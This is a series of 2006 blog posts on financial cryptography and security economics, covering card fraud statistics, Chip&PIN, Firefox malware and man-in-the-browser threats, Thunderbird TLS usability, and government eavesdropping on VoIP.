    Nearly 10 million consumers were victimized by some form of identity theft in 2004 alone. That equals 19,178 people per day, 799 per hour and 13.3 per minute. Consumers have reportedly lost over US$5 million, and businesses have lost an estimated $50 billion or more.

    A few years back the accepted figure for identity theft in the USA was around $10bn; maybe it is being revised upwards to 50bn or more (?) with inclusion of internal (unreported) corporate costs.

    And, let's close with a curious comparison: Cubicle reports on stats on the real Piracy!

    …there is very little financial incentive for both governments and shippers to deal with this crime. Piracy is costing shippers $.32 for every $10,000 of goods shipped estimates David N. Kellerman of Maritime Security. Not only is the economic cost inconsequential to companies, so it is to some governments.

    Sound familiar? If I’m the corporate owner, the cost is inconsequential. If I’m a sailor on one of these ships, though, the cost is a little more significant:

    Merely one year before, in September of 1998, a smaller Japanese-owned freighter named the Tenyu had gone missing soon after departing from the same port of Kuala Tanjung with a similar load of aluminum, and a crew of fifteen. Three months later the Tenyu was discovered under a changed name and flag in a Chinese port, but the cargo was missing, as was the original crew, all of whom are presumed to have been killed.

    Ship owners can transfer the risk of Piracy with insurance, but sailors only have two options. They can either avoid the risk by finding a new vocation (not sailing on vessels which travel through pirate-prone regions is not really an option) or hope that the shipowners mitigate it by implementing anti-piracy safeguards such as anti-boarding defenses or armed guards, at least for passing through piracy-prone areas.

    Somehow, identity theft seems a little more comfortable.

    Posted by iang at 11:55 PM | Comments (2) | TrackBack

    August 16, 2006

    Fraudwatch - Chip&PIN one-sided story, banks and deception and liability shifts

    First some good news from PaymentNews:

    APACS, the UK payment association, has announced that six months after "PIN day" (Valentine’s Day 2006, February 14th), the UK is the world's first chip and PIN success story - with more than 99.8% of all chip and PIN card transactions are now PIN-verified and more than 150 chip and PIN transactions take place every second. (compared with 125 a second six months ago and 85 a second a year ago).

    The UK’s banks and card companies have now issued 130 million chip and PIN cards representing 92% of a total of 141 million cards. Approximately 850,000 tills have been upgraded to chip and PIN, representing 87 per cent of all tills in the UK - and retailers have reported that "transaction times have become quicker with queues in shops shorter." In addition, in 2005 there was a reduction of nearly £60m in counterfeit and fraud on lost and stolen cards (a drop of 24%) compared to 2004.

    Said Sandra Quinn of chip and PIN: “Britain is now a truly mature chip and PIN nation. Millions of people have adapted to the change with no problems at all. This means that we are all a lot safer when we go shopping, and that fraudsters have been denied millions of pounds of stolen money. Of course it hasn’t eradicated fraud, it never could, as fraudsters will continue to target us and our money. But it is a fact that chip and PIN has made our cards safer than they were two years ago and banks and retailers will continue to work together to keep it this way. Now we need to remain vigilant, as fraudsters will always try to find other ways to get hold of our money. That is why we are constantly reminding cardholders how to protect themselves from fraud.”

    Now, readers will recall recent trouble when the new chip and PIN cards suffered some fraud. What we see above is the success story but only a mention of the failure story, leaving us unsure what to make of the numbers. Last year, APACS reported that Internet fraud now accounts for one quarter of all fraud losses in the UK, so they are certainly capable of reporting fraud.

    Here's an older story giving some indication (again from APACS):

    The Scotsman reports on the impact on card fraud from the introduction of chip and PIN technology in the UK, reducing credit and debit card losses by 13 percent in the first six months of 2005.

    The figures showed counterfeit card fraud fell by 31%, fraud on lost or stolen cards dropped by 27%, losses on cards that went missing in the mail was 37% lower and identity theft on payment cards was down by 16%

    Not quite as rosy as the chip&PIN story would have us believe, and others are skeptical. More tarnished image for the US banks for deceptive practices:

    The Office of the Comptroller of the Currency has issued new guidance on disclosure and marketing issues associated with gift cards - focusing on "the need for national banks that issue gift cards to do so in a manner in which both purchasers and recipients are fully informed of the product's terms and conditions." ... Basic information that is most essential to a gift card recipient's decisions about when and how to use the card should be provided on the gift card itself, or on a sticker or tape affixed to the gift card. Disclosures should generally tell consumers:
    • The expiration date of the card (which should appear on the front of the card);
    • The amount or the existence of any monthly maintenance, dormancy, usage or similar fees;
    • How to obtain additional information about their cards or other customer service (for example, by providing a toll free number or website address).

    The OCC's new guidance also advises national banks to avoid practices that could be misleading to consumers. For example, issuers should not advertise a gift card with "no expiration date" if monthly service or maintenance fees, dormancy fees or similar charges can consume the card balance. Similarly, if fees may consume the card balance before the stated expiration date, disclosures related to that expiration date should explain that possibility. Issuers should also avoid describing gift cards as if they are gift certificates or other payment instruments more familiar to consumers, or as products that carry federal deposit insurance.

    This is bad news because it indicates that deceptive behaviour is prevalent in the gift card business. (Note that the pre-paid / gift card business is exploding, as Dave Birch reports and as I mooted last year in bull #4. E.g. this is a significant sector for financial cryptographers to track. From PN, see also WSJ and Teenage spending.)

    One would expect that banks would not engage in such ... but the need for guidance suggests otherwise. Indeed, is the following deceptive behaviour by APACS, in the aforementioned press release?

    The consumer continues to be protected from card fraud losses by The Banking Code. Nothing changes for the consumer. Just as now, cardholders do need to be responsible in protecting their cards and keep their PIN a secret.

    Right. But what about the retailers and any liability shift in chip & PIN? And, to underscore the ability of the banks to shift liability:

    The survey of 2,000 net users found that five per cent had fallen victim to scams and had lost out financially. Half of victims received no compensation from their banks while one in ten is still waiting for the matter to be resolved.

    Here's more evidence on how easy it is to fool people when someone ran a random survey for ID theft bait:

    • More than 70% of respondents gave up their mother's maiden name
    • More than 90% of people provided both their date and place of birth
    • Nearly 55% explained how they devise their online passwords
    • Nearly 85% of respondents provided their full name, current street address, and email address

    Is card fraud going up or down? Visa says down:

    Visa says fraud accounts for about 7 cents of every $100 spent on its credit cards, an all-time low and about half the rate of 10 years ago.

    And APACS says up:

    Last year, credit card fraud was equivalent to £12 for every cardholder in the UK. The amount lost every year has jumped by a massive 600 percent over the last six years. Last year, the Which? survey had found that six percent of current account holders and five percent of credit card holders had been a victim of fraud at some point of time. The Association of Payment Clearing Services (APACS) says that UK card fraud hit over £500 million last year, a 20 percent rise from the figures in 2003.

    CyberSource says up, for retailers (but original Yahoo source is lost):

    CyberSource has announced the results of its 7th annual CyberSource Fraud Survey. Among the survey's findings, the estimate for ecommerce fraud losses increased to more than $2.8 billion for 2005, an 8% increase over the year before. Although the overall rate of fraud loss remained relatively constant at 1.6% of revenue, mid-to-large merchants selling $5-$25 million annually online reported fraud losses increasing from 1.5% to 1.8% of revenue while those selling over $25 million reported losses increasing from 1.1% to 1.2% of revenue.

    So maybe we can suspect that the banks are becoming more successful in shifting the fraud losses away from themselves and on to consumers and/or retailers. JPM reports that it's ever present:

    Retail operations have "slippage" (shop lifting) ... it is just built right in to the figures. They expect that slippage will be 4% on an ongoing basis, but 3% in video stores, but 5% in candy stores, 0.05% in petrol stations ("drive offs"), etc.

    Plenty of room to shift out some bank liabilities then! The problem with shifting the liabilities is that the consumer pays in the end, regardless of how the cut is taken. So our objective should not be for any one party to just reduce their own liabilities -- they can always pass it on -- but instead to identify the most efficient place to accept and pay for the frauds.

    Where is that place, then? And, where is the debate about how payment systems operators, retailers and consumers create that efficient sharing?

    Posted by iang at 09:04 AM | Comments (3) | TrackBack

    July 28, 2006

    Firefox as a mainstream security risk - three threats

    As predicted, Firefox is now a member of that unenviable club -- "fair game" for crackers:

    Upon successful execution, FormSpy hooks mouse and keyboard events in the Mozilla Firefox web browser. It can then forwards information such as credit card numbers, passwords and URLs typed in the browser to a malicious website hosted at IP address 81.95.xx.xx.
    And, a bunch of reports on a security advisory 1, 2, 3, 4.

    Also, a very strange one where PrivSoft, security firm labelled a root key as viral from the Bermudan certificate authority QuoVadis:

    On Saturday, July 22, 2006 we added a "signature" to BOClean called "QUOVADIS" based upon a submission to us by one of our external malware research partners. The submission was reviewed by one of our own malware analysts and was determined to be extremely suspicious because it modified the Windows registry "trusted certificates" store and that's always a "no-no." The fact that it was submitted out of context to its origin unfortunately lead us to believe by its design and nature that it was a Mozilla hijacker since it appeared to be legitimate and yet didn't pass the "smell test" because of its internal contents and behavior. We encounter similar "infections" often. The decision was "unfortunately" made to err on the side of caution and INCLUDE it in BOClean's update of that day.

    Within a little over an hour, based upon numerous complaints of a "false positive," we removed detection for the NSSCKBI.DLL file as QUOVADIS malware. Now, we're not quite sure if there actually isn't an issue there, though apparently not one that rises to the level of an actual piece of malware since Mozilla's browsers are "trusted." As is the case with any "surprise" here, a post mortem remains in progress on our end to bring closure and internal policy changes to prevent any future "unfortunate events" such as this.

    Mozilla's NSSCKBI.DLL file contains a number of "secure sockets layer" (SSL) certificates, including certificates from several unknown and possibly dubious "certifying authorities." ...

    I don't fully understand that, but it reads as though someone complained about the Quovadis root key (which I understand to be a valid CA), and the security firm blocked the whole root list in the DLL? Either way, "privsoft" seems to have been disconnected from the net as we know it; the information on who is a valid CA or not is widely available on Mozilla's pages. And an email to Frank would have sorted it out...

    It will be interesting to see just what this complaint really was -- an enterprising CA engaged in corporate provocation? Bad security firms dropping the bundle like they did with Sony? Or is the Quovadis root really involved in some sense in a malicious change the windows registry? Keep it up, guys, us ignorant journos and our readers want scandal, intrigue, and see if you can do something about spies and tits for us too, please!

    What else? Well, I've also seen a demo of the latest generation attacks against Firefox (if you read the blog, you know what I mean). Unfortunately, when it was shown around, the banks said "oh-my-god, who have you shown this to? you can't reveal this..."

    This is a direct case of fear of fingerpointing, which I outline in my paper on "The Market for Silver Bullets."

    Should such things be published? The answer is YES! Firstly, the attackers already have this, they are smarter and more focussed, and if they only appear not to have attacked it is because they have other things to do that make them money. Focus, ROI, two easy words. (As if to underscore this point, first reports have it that European banks are being attacked with an innovative MITB that asks for two TANS, so far targetted at IE only.)

    Did I say that the attackers were smarter than the banks? Yes, I did. Get used to it.

    Secondly, consider the *user* community, which includes all Alices and Bobs, all Grandmas, all banks in countries where they haven't figured it out yet (e.g., the US of A), and all the other non-bank suppliers who are about to be surprised at how far this threat reaches.

    They ... heck ... *we all need this information* so that they can assess risks in going forward. It may surprise the banks, but it is their customers' right to know when it is unsafe to engage in online banking.

    Why this discrepancy? The banks do not carry the costs of risks to others, so they don't care. They only care about their own costs, which in the end are surprisingly limited, surprisingly manageable, even in the American phishing epidemic.

    Why then are the banks so fiercely protective of their security weaknesses? Because embarrassment in the press is far more costly than any mere security breach! As they bear these costs themselves, directly, and the costs spread contagiously through the industry, they are vulnerable to what I call fingerpointing. This then drives them to render all security issues under a secrecy order, industry wide. For more understanding of why banks are not particularly concerned about the user's risks, read the paper.

    Which leaves me wondering where Firefox is heading, market-wise. If anything, things like GreaseMonkey and the spectacular plugins market are making Firefox a more likely target for security concerns. I've also noticed a bit of a ground shift in talk over at Mozilla -- they no longer refer to Firefox as more secure than IE. That is wise, as it seems that Microsoft are doing more in that area. If the IE and Vista teams succeed in making a difference, Firefox can expect to be hammered into the ground.

    Which isn't necessarily bad. Mozilla are leaning towards a mission of "choice" in tools, which is no bad mission. It's simply not necessary or smart to be all things to all people, it is better to concentrate on where we can make a difference.

    But it does leave a hole in the market for a security browser. And it raises the question for the FC blog of revising our top tips for security. Any call?

    Posted by iang at 08:40 AM | Comments (4) | TrackBack

    July 23, 2006

    Case Study: Thunderbird's brittle security as proof of Iang's 3rd Hypothesis in secure design: there is only one mode, and it's secure.

    In talking with Hagai, it was suggested that I try using the TLS/IMAP capabilities of Thunderbird, which I turned on (it's been a year or two since the last time I tried it). Unfortunately, nothing happened. Nothing positive, nothing negative. Cue in here a long debate about whether it was working or not, and how there should be a status display, at least, and various other remedies, at most.

    A week later, the cleaning lady came in and cleaned up my desk. This process, for her, also involves unpowering the machine. Darn, normally I leave it on for ever, like a couple of months or so.

    On restarting everything, Thunderbird could not connect to the mail servers. Our earlier mystery is thus resolved - the settings don't take effect until restart. Doh!

    So, how then did Thunderbird handle? Not so well, but it may have got there in the end. This gives me a change to do a sort of case study in 1990s design weaknesses, a critique in (un)usability, leading to design principles updated for this decade.

    To predict the punch line, the big result is that there should only be one mode, and it should be secure. To get there more slowly, here's what I observed:

    Firstly, Thunderbird grumbled about the certificate being in the wrong name. I got my negative signal, and I knew that there was something working! Hooray!

    But, then it turned out that Thunderbird still could not connect, because "You have chosen secure authentication, but this server does not offer it. Therefore you cannot log in..." Or somesuch. Then I had to go find that option and turn it off. This had to be done for all mail accounts, one by one.

    Then it worked. Well, I *guess* it did... because funnily enough it already had the mail, and again had not evidenced any difference.

    Let's break this up into point form. Further, let's also assume that all competing products to be as bad or worse. I actually *choose* Thunderbird as my preferred email client, over say Kmail. So it's not as bad as it sounds; I'm not "abandoning Thunderbird", I'm just not getting much security benefit from it, and I'm not recommending it to others for security purposes.

    1. No caching of certs. There is no ability to say "Yes, use that cert for ever, I do know that the ISP is not the same name as my domain name, dammit!!!!" This is an old debate; in the PKI world, they do not subscribe to the theory that the user knows more than any CA about her ISP. One demerit for flat earth fantasies.
    2. No display anywhere that tells me what the status of the security is. One demerit. (Keep in mind that this will only be useful for us "qualified cryptoplumbers" who know what the display means.)
    3. I can choose "secure authentication" and I can choose "secure connection." As a dumb user, I have no idea what that means, either of them. One demerit.
    4. If I choose one of those ON, and it is not available, it works. Until it doesn't -- it won't connect at some later time and it tells me to turn it off. So as a user I have a confusing choice of several options, but ramifications that do not become clear until later.

      Another demerit: multiple options with no clear relationship, but unfortunate consequences.

    5. Once it goes wrong, I have to navigate from a popup telling me something strange, across to a a series of boxes in some other strange area, and turn off the exact setting that I was told to, if I can remember what was on the popup. Another demerit.
    6. All this took about 5 minutes. It took longer to do the setting up of some security options than it takes to download, install, and initiate an encrypted VoIP call over Skype with someone who has *never used Skype before*. I know that because the previous night I had two newbies going with Skype in 3 minutes each, just by talking them through it via some other chat program.
    7. Normal users will probably turn it all off, as they won't understand what's really happening, and "I need my mail, darnit!"

      (So, we now start to see what "need" means when used by users... it means "I need my email and I'll switch the darned security rubbish off and/or move to another system / supplier / etc.)

    8. This system is *only useable by computer experts.* The only reason I was able to "quickly" sort this out was because I knew (as an experienced cryptoplumber) exactly what it was trying to do. I know that TLS requires a cert over the other end, *and* there is a potential client-side cert. But without that knowledge, a user would be lost. TLS security as delivered here is a system is not really up to use by ordinary people - hence "brittle."

    We can conclude that this is a nightmare in terms of:

    • usability.
    • implementation.
    • design.
    • standards.

    Let's put this in context: when this system was designed, we didn't have the knowledge we have now. Thunderbird's security concept is at least 3 years old, probably 8-10 years old. Since those years have passed, we've got phishing, usability studies, opportunistic crypto, successful user-level cryptoapps (two, now), and a large body of research that tells us how to do it properly.

    We know way more than we did 3 years ago - which was when I started on phishing. (FTR, I suggested visit counts! How hokey!)

    Having got the apologies off our chest, let's get to the serious slamming: If you look at any minor mods to the Thunderbird TLS-based security, like an extra popup, or extra info or displays, you still end up with a mess. E.g., Hagai suggested that there should be an icon to display what is going on - but that only helps *me* being an experience user who knows exactly what it is trying to tell me. I know what is meant by 'secure authentication' but if you ask grandma, she'll offer you some carrot cake and say "yes, dear. now have some of this, I grew the carrots myself!"

    (And, in so doing, she'll prove herself wiser than any of us. And she grows carrots!)

    Pigs cannot be improved by putting them in dresses - this security system is a pig and won't be improved by frills.

    The *design* is completely backwards, and all it serves to do is frustrate the use of the system. The PKI view is that the architecture is in place for good reasons, and therefore the user should be instructed and led along that system path. Hence,

    "We need to educate the users better."

    That is a truly utterly disastrous recommendation. No! Firstly, the system is wrong, for reasons that we can skip today. Secondly, the technical choices being offered to the users are beyond their capabilities. This can never be "educated." Thirdly, it's a totally inefficient use of the user's time. Fourthly, the end effect is that most users will not ever get the benefit.

    (That would be a mighty fine survey -- how many users get the benefit of TLS security in Thunderbird? If it is less than 10%, that's a failure.)

    The system should be reversed in logic. It should automatically achieve what it can achieve and then simply display somewhere how far it got:

    1. Try for the best, which might be secure auth, and then click into that. Display "Secure Auth" if it got that far.
    2. If that fails, then, fallback to second best: try the "Secure Conn" mode, and display that on success.
    3. Or finally, fall back to password mode, and display "Password only. Sorry."

    The buttons to turn these modes on are totally unneccessary. We have computers to figure that sort of nonsense out.

    Even the above is not the best way. Fallback modes are difficult to get right. They are very expensive, brittle even. (But, they are better - far far far cheaper - than asking the user to make those choices.) There is still one way to improve on this!

    Hence, after 5 demerits and a handful of higher-level critiques, we get to the punchline:

    To improve, there should only be one mode. And that mode is secure. There should be only one mode, because that means you can eliminate the fallback code. Code that falls back is probably twice as large as code that does not fallback. Twice as brittle, four times as many customer complaints. I speak from experience...

    The principle, which I call my 3rd Hypothesis in Secure Protocol Design, reads like this:

    There is only one mode, and it is secure.

    If you compare and contrast that principle with all the above, you'll find that all the above bugs magically disappear. In fact, a whole lot of your life suddenly becomes much better.

    Now, again, let's drag in some wider context. It is interesting that email can never ever get away from the fact that it will always have this sucky insecure mode. Several of them, indeed. So we may never get away from fallbacks, for email at least.

    That unfortunate legacy should be considered as the reality that clashes with the Hypothesis. It is email that breaches the Hypothesis, and it and all of us suffer for it.

    There is no use bemoaning the historical disaster that is email. But: new designs can and will get it right. Skype has adopted this Hypothesis, and it took over - it owns VoIP space in part because it delivered security without the cost. SSH did exactly the same, before.

    In time, other communication designs such as for IM/chat and emerging methods will adopt Hypothesis #3, and they will compete with Skype. Some of the mail systems (Start/TLS ?) have also adopted it, and where they do, they do very well, allegedly.

    (Nobody can compete with SSH, because we only need one open source product there - the task is so well defined there isn't any room for innovation. Well, that's not exactly true - there are at least two innovations coming down the pipeline that I know of but they both embrace and extend. But that's topic drift.)

    Posted by iang at 07:19 AM | Comments (10) | TrackBack

    July 02, 2006

    Apple to help Microsoft with "security neutrality"?

    Peter points to news that Apple are moving (back) to a proprietary OS. It's not entirely clear as yet, but it looks like the Intel Mac OSX will go proprietary.

    Apple still publishes the source code for OS X's commands and utilities and laudably goes several extra miles by open sourcing internally developed technologies such as QuickTime Latest News about QuickTime Streaming Server and Bonjour zero-config networking.

    The source code required to build a customized OS X kernel, however, is gone. Apple says that the state of an OS X-compatible open source x86 Darwin kernel is "in flux."

    The article waxes on about performance and tuning and the like, but I worry about security. The reason this blog's "Top Tip #1" for your security is to buy a Mac is not because I like them, but because they are relatively secure. Relative being the operative word here -- for best user-bang-for-buck, they are the way to go if security is your need.

    The marketing people will likely waffle on about how they can be just as secure with a proprietary OS as without. "Honest Injun!"

    Nonsense. Here's what happens. Once the public scrutiny goes, the internal food fights start. Once the OS team no longer has the easy excuse of "that's insecure and _someone will notice_," all of the application teams' marketing directors will be lining up to throw old eggs and rotten tomatoes at the OS team.

    Going open source doesn't make it secure -- you've still got to do the hard work. It only makes it possible to go secure. And without it, it is unlikely that you can be secure in a complex, multi-application, mammoth user base scenario like Apple's, no matter how good your people are. Open source works like governance in security, it's the feedback mechanism that keeps you honest.

    If Apple withdraws the committment to open, honest security, I'd give it five years, and they won't be able to open it again. They'll have caught up with Microsoft, the OS will be riddled inside with strange and scary artifacts, and that nice shiny apple will be skin, only, the worms having eaten the core away.

    Still, one supposes that the other guys needs a "level playing field." Or perhaps we should call it "security neutrality" to use the current inanity. There's a thought -- Adam is going to work for Microsoft security. Wouldn't it be ironic if Microsoft were to announce an open source policy ... beyond the Chinese government that is ... and take another bite out of the apple?

    Posted by iang at 07:53 AM | Comments (4) | TrackBack

    June 26, 2006

    Sealand - more pictures

    Fearghas points to more graphical evidence of risk practices from the Lifeboat station in Harwich.

    For those bemused by this attention -- a brief rundown of "Rough Towers," a.k.a. Sealand. Some 5 or so years ago, some colourful libertarian / cypherpunk elements started a "data haven" called Havenco running in this "claimed country". Rumour has it that after the ISP crashed and burnt, all the servers were moved up the Thames estuary to London.

    Not wishing to enter into the discussion of whether this place was *MORE* risky or less risky ... Chandler asks:

    What kind of country doesn't have a fire department? One that doesn't plan on having a fire, as evidenced by the fact that Sealand/HavenCo didn't have fire insurance.

    Well, as they were a separate jurisdiction, they probably hadn't got around to (ahem) legislating an insurance act? Or were you thinking of popping into the local office in Harwich and picking up a home owner's policy?

    :) More pictures on site.

    Posted by iang at 07:14 PM | Comments (1) | TrackBack

    June 25, 2006

    FC++3 - Concepts against Man-in-the-Browser Attacks

    This emerging threat has sent a wave of fear through the banks. Different strategies have been formulated and discussed in depth, and just this month the first roll-outs have been seen in Germany and Austria. This information cries out for release as there are probably 10,000 other banks out there that would have to go through and do the work again.

    Philipp Gühring has collected the current best understanding together in a position paper entitled "Concepts against Man-in-the-Browser Attacks."

    Abstract. A new threat is emerging that attacks browsers by means of trojan horses. The new breed of new trojan horses can modify the transactions on-the-fly, as they are formed in in browsers, and still display the user's intended transaction to her. Structurally they are a man-in-the-middle attack between the the user and the security mechanisms of the browser. Distinct from Phishing attacks which rely upon similar but fraudulent websites, these new attacks cannot be detected by the user at all, as they are use real services, the user is correctly logged-in as normal, and there is no difference to be seen.

    The WYSIWYG concept of the browser is successfully broken. No advanced authentication method (PIN, TAN, iTAN, Client certificates, Secure-ID, SmartCards, Class3 Readers, OTP, ...) can defend against these attacks, because the attacks are working on the transaction level, not on the authentication level. PKI and other security measures are simply bypassed, and are therefore rendered obsolete.

    If you are not aware of these emerging threats, you need to be. You can either get it from sellers of private information or you can get it from open source information sharing circles like FC++ !

    Posted by iang at 12:43 PM | Comments (8) | TrackBack

    FC++3 - The Market for Silver Bullets

    In this paper I dip into the esoteric theory of insufficient markets, as pioneered by Nobel Laureate Michael Spence, to discover why security is so difficult. The results are worse than expected - I label the market as one of silver bullets. Yes, there are things that can be done, but they aren't the things that people have been suggesting.

    This paper is a bit tough - it is for the serious student of econ & security. Far from being the pragmatic "fix this now" demands of Philipp Gühring and the "rewrite it all" diagnosis of Mark Miller, it offers a framework of why we need this information out there in the public sphere.

    What is security?

    As an economic `good' security is now recognised as being one for which our knowledge is poor. As with safety goods, events of utility tend to be destructive, yet unlike safety goods, the performance of the good is very hard to test. The roles of participants are complicated by the inclusion of agressive attackers, and buyers and sellers that interchange.

    We hypothesize that security is a good with insufficient information, and reject the assumption that security fits in the market for goods with asymmetric information. Security can be viewed as in a market where neither buyer nor seller has sufficient information to be able to make a rational buying decision. These characteristics lead to the arisal of a market in silver bullets as participants herd in search of best practices, a common set of goods that arises more to reduce the costs of externalities rather than achieve benefits in security itself.

    Does it really show that the security market is one of silver bullets, and best practices are bad, not good? You be the judge! That's what we do in FC++, put you in the peer-review critic's seat.

    Posted by iang at 11:53 AM | Comments (1) | TrackBack

    June 20, 2006

    Security Absurdity: The Complete, Unquestionable, And Total Failure of Information Security

    Mark points to Noam Eppel. If you haven't subscribed to the "total collapse of security and humanity as we know it" theory, then I'd encourage you to read "Security Absurdity: The Complete, Unquestionable, And Total Failure of Information Security." Even just skimming the list of headline failures will help :)

    They say if you drop a frog in a pot of boiling water, it will, of course, frantically try to clamber out. But if you place it gently in a pot of tepid water and turn the heat on low, it will float there quite placidly. As you turn up the heat, the frog will sink into a tranquil stupor and before long, with a smile on its face, it will unresistingly allow itself to be boiled to death. The security industry is much like that frog; completely and uncontrollably in disarray - yet we tolerate it since we are used to it.

    It is time to admit what many security professionals already know: We, as security professionals, are drastically failing ourselves, our community, and the people we are meant to protect. ...

    You may not agree with the central claim, but at least the article clearly lays out the evidence, from top to bottom. It is important to understand the claim and its foundations, even if you don't agree, because much of the new work that is being done is based on the complete replacement of large chunks of old wisdom. This only makes sense if we can claim that the old ways were wrong.

    (If you want more, here's a reference: I broached this subject in a recent JIBC article l wherein I assumed security was a failure, and went on to list some of the open areas of research.)

    Posted by iang at 07:37 AM | Comments (0) | TrackBack

    June 19, 2006

    Black Helicopter #2 (ThreatWatch) - It's official - Internet Eavesdropping is now a present danger!

    A group of American cryptographers and Internet engineers have
    criticised the FCC for issuing an order that amounts to a wiretap instruction for all VoIP providers.

    For many people, Voice over Internet Protocol (VoIP) looks like a nimble way of using a computer to make phone calls. Download the software, pick an identifier and then wherever there is an Internet connection, you can make a phone call. From this perspective, it makes perfect sense that anything that can be done with a telephone, including the graceful accommodation of wiretapping, should be able to be done readily with VoIP as well.

    The FCC has issued an order for all ``interconnected'' and all broadband access VoIP services to comply with Communications Assistance for Law Enforcement Act (CALEA) --- without specific regulations on what compliance would mean. The FBI has suggested that CALEA should apply to all forms of VoIP, regardless of the technology involved in the VoIP implementation.

    In brief the crypto community's complaint is that it is very difficult to implement such enforced access, and to do so may introduce risks. I certainly agree with the claim of risks, as any system that has confused requirements becomes brittle. But I wouldn't bet on a company not coming out with a solution to these issues, if the right way to place the money was found. I've previously pointed out that Skype left in a Centralised Vulnerability Party (CVP, sometimes called a TTP), and last week we were reminded of the PGP Inc blunder by strange and bewildering news over in Mozilla's camp.

    So where are we? The NSA has opened up the ability to pen-trace all US phones, more or less. Anyone who believes this is as far as it goes must be disconnected from the net. The EFF's suit alleges special boxes that split out the backbone fibre and suck it down to Maryland in real time. The FBI has got the FCC to order all the VoIP suppliers into line. Mighty Skype has been brought to heel by the mighty dollar, so it's only a phone call away.

    Over in other countries - where are they, again? - there is some evidence that police in European countries have routine access to all cellphone records. There is other evidence that the EU may already have provided the same call records to the US (but not the other way around, how peculiar of those otherwise charming Europeans) in much the same way as last week the EU were found to be illegally passing private data on air travellers. To bring this into perspective, China of course leads the *public* battle for most prominent and open eavesdropper with their Cisco Specials, but one wonders whether they would be actually somewhat embarrassed if their capabilities were audited and compared?

    If you are a citizen of any country, it seems, you need not feel proud. What can we conclude?

    1. Eavesdropping has now moved to a real threat for at least email and VoIP, in some sense or other.
    2. Can we say that it is a validated threat? No, I think not. We have not measured the frequency and cost levels so we have no actuarial picture. We know it is present, but we don't know how big it is. I'll write more on this shortly.
    3. The *who* that is doing it is no longer the secure, secret world of the spooks who aren't interested in you. The who now includes the various other agencies, and they *are* interested in you.
    4. Which means we are already in a world of widespread sharing across a wide range of government agencies. (As if sharing intel has not been a headline since 9/11 !)
    5. it is only one step from open commercial access. Albeit almost certainly illegal, there isn't likely to be anything you can do about illegally shared data, because it is the very agents of the law which are responsible for the breach, and they will utter the defence of "national security," to you, and the price, to your attacker.
    6. An assault on crypto can't be that far off. The crypto wars are either already here again, or so close we can smell them.
    7. We are not arguing here, today, whether this is a good thing for the mission to keep us safe from terrorists, or a bad thing. Which is just as well, because it appears that when they are given the guy's head on a plate, the law enforcement officers still prefer to send out for takeaway.

    My prediction #1for 2006 that government will charge into cyberspace in a big way is pretty much confirmed at this stage. Obviously this was happening all along, so it was going to come out. How important is this to you the individual? Here's an answer: quite important. And here's
    some evidence:

    What is Political Intelligence?Political intelligence is information collected by the government about individuals and groups.
    Files secure under the Freedom of Information Act disclose that government officials have long been
    interested in all forms of data. Information gathered by government agents ranges from the most personal data about sexual liaisons and preferences to estimates of the strength of groups opposing U.S. policies. Over the years, groups and individuals have developed various ways of limiting the collection of information and preventing such intelligence gathering from harming their work.

    It has now become routine for political activists -- those expressing their rights under democracy -- to be investigated by the FBI. In what is a blowback to the days of J.Edgar Hoover, these activists now routinely advising their own people on how to lawfully defend themselves.

    Hence the pamphlet above. There are two reasons for gathering information on 'sexual liasons and preferences.' Firstly, blackmail or extortion. Once an investigator has secret information on someone, the investigator can blackmail -- reveal that information -- in order to extort the victim to turn on someone else. Secondly, there may be some act that is against the law somewhere, which gives a really easy weapon against the person. Actually, they are both the same reason.

    If there is anyone on the planet who thinks that such information shouldn't be protected then, I personally choose not to be persuaded by that person's logic ("I've got nothing to hide") and I believe that we now have a danger. It's not only from the harvesting by the various authorities:

    Peter G, 41, asked for a divorce from his wife of six years, Lori G, 38, in March 2001. ... Lori G filed a counterclaim alleging the following: <snip...> and wiretapping. The wiretapping charges are what make this unfortunate case relevant to Police Blotter. ... But Peter admitted to "wiretapping" Lori's computer.

    The description is general: Peter used an unspecified monitoring device to track his wife's computer transactions and record her e-mails. Lori was granted $7,500 on the wiretapping claim. ...

    This is hardly the first time computer monitoring claims have surfaced in marital spats. As previously reported by CNET News.com, a Florida court ruled last year that a wife who installed spyware on her husband's computer to secretly record evidence of an extramarital affair violated state law.

    Some hints on how to deal with that danger. Skype is probably good for the short term in talking to your loved one while he still loves you, notwithstanding their CVP, as that involves an expensive, active aggressive act which incurs a risk for the attacker. However, try and agree to keep the message history off - you have to trust each other on this, as the node and your partner's node remain at greater danger. Email remains poor because of the rather horrible integration of crypto into standard clients - so use Skype or other protected chat tools.

    Oh, and buy a Mac laptop. Although we do expect Macs to come under increased attention as they garner more market share, there is still a benefit in being part of a smaller population, and the Mac OS is based on Unix and BSD, which has approximately 30 years of attention to security. Windows has approximately 3 years, and that makes a big difference.

    (Disclosure: I do not own a Mac myself, but I do sometimes use one. I hate the GUI, and the MacMini keyboards are trash.)

    Posted by iang at 01:20 PM | Comments (1) | TrackBack

    June 17, 2006

    Microsoft - will they bungle the security game?

    I suspect Microsoft are going to blow the security game. Here's the evidence:

    A recent Microsoft update to Windows XP, which modifies the tool that verifies the "validity" of XP installations to ensure that they are not illicit, may itself be considered to be spyware under commonly accepted definitions.

    The new version of the "Microsoft Genuine Advantage" tool reportedly will repeatedly nag users of systems it declares to be invalid, and will then apparently deny such users various "non-critical" updates. Apparently various parties have already found ways to bypass this tool, though the effects of this on later updating capabilities remain to be seen.

    However, I've noted a much more serious issue on local XP systems, all of which are legit and pass the MS validity tests with flying colors. It appears that even on such systems, the MS tool will now attempt to contact Microsoft over the Internet *every time you boot*. At least, I'm seeing these contacts on every boot after the tool update so far, and I've allowed them to proceed to completion each time. Perhaps it stops after some number of boots, but there's no indication of such a limit so far. The connections occur even if you do not have Windows "automatic update" enabled. ...

    That's about XP, their older product. Here's what what they are trying to address:

    Microsoft (Nasdaq: MSFT) Latest News about Microsoft on Monday revealed the results of a 15-month test of its Malicious Software Removal Tool. The utility that seeks out and destroys malware reported malicious programs, or bots, on six out of 10 Windows computers it examined.

    And here's the problem. Microsoft are responsible for the old mess, and to their credit, they are in some sense or other recognising the size of the problem by reporting on it, above. (They can't go too far, otherwise they'll be dealing with the MOACAS - mother of all class action suits.)

    So they are doing what others -- Symantec, Kapersky, etc -- have developed over decades to fix the product: putting in anti-virus tools and pretending that these are the latest must-have fashion accessories.

    Can you say conflict of interest ? On the superficial level, we have these problems:

    1. they are making money off the problems they delivered last time. Well, sometimes that is good, but not always, not when everyone knows it.
    2. any problem they fix is subject to approval and re-interpretation by the publicity arms. That is, you can't fix a problem if you have to reveal it, and the PR people say it's too dangerous to reveal.
